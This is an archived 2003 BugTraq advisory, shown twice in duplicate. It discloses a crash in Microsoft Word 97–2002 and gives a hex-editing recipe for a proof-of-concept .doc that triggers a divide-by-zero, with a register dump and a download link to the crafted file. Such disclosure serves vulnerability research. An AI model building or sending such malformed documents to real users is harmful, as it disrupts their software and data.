BugTraq
Back to list
|
Post reply
Bug in Microsoft Word
Oct 03 2003 06:15PM
Bahaa Naamneh (b_naamneh hotmail com)
Bug in Microsoft Word
Affected Systems: Microsoft Word 97, 98(J), 2000, 2002
Release Date: September 28, 2003
Technical Description:
=============
The following steps can be performed in order to create a proof of
concept Word document:
1. Open Word.
2. Save .doc file.
3. Modify .doc file by using binary editor as follows:
these lines were taken from .doc file of Microsoft Word 2002(10.2627.3311):
00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01
00 00 00 00 00 00 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c
01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00
-------
4. Change them as follows:
00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01
00 00 62 62 62 62 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c
01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00
-------
5. Open modified .doc file.
6. Microsoft Word will crashes.
Integer Divide by Zero:
30405E1E div eax,edi
EAX = 62626262 EBX = 0091FDC0
ECX = 00008000 EDX = 00000000
ESI = 00000000 EDI = 00000000
EIP = 30405E1E ESP = 001263A8
EBP = 00126EE4 EFL = 00000246
div command will divide the eax by the edi
If edi = 0
then anything/0 can't happen.
* modified .doc file can be downloaded from:
http://www12.brinkster.com/bsecurity/Doc1.doc
Vendor status:
=========
The vendor has been informed.
Discovered by/Credit:
=============
Bahaa Naamneh
b_naamneh (at) hotmail (dot) com [email concealed]
http://www.bsecurity.tk
_________________________________________________________________
Tired of spam? Get advanced junk mail protection with MSN 8.
http://join.msn.com/?page=features/junkmail
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Affected Systems: Microsoft Word 97, 98(J), 2000, 2002
Release Date: September 28, 2003
Technical Description:
=============
The following steps can be performed in order to create a proof of
concept Word document:
1. Open Word.
2. Save .doc file.
3. Modify .doc file by using binary editor as follows:
these lines were taken from .doc file of Microsoft Word 2002(10.2627.3311):
00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01
00 00 00 00 00 00 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c
01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00
-------
4. Change them as follows:
00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01
00 00 62 62 62 62 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c
01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00
-------
5. Open modified .doc file.
6. Microsoft Word will crashes.
Integer Divide by Zero:
30405E1E div eax,edi
EAX = 62626262 EBX = 0091FDC0
ECX = 00008000 EDX = 00000000
ESI = 00000000 EDI = 00000000
EIP = 30405E1E ESP = 001263A8
EBP = 00126EE4 EFL = 00000246
div command will divide the eax by the edi
If edi = 0
then anything/0 can't happen.
* modified .doc file can be downloaded from:
http://www12.brinkster.com/bsecurity/Doc1.doc
Vendor status:
=========
The vendor has been informed.
Discovered by/Credit:
=============
Bahaa Naamneh
b_naamneh (at) hotmail (dot) com [email concealed]
http://www.bsecurity.tk
_________________________________________________________________
Tired of spam? Get advanced junk mail protection with MSN 8.
http://join.msn.com/?page=features/junkmail
[ reply ]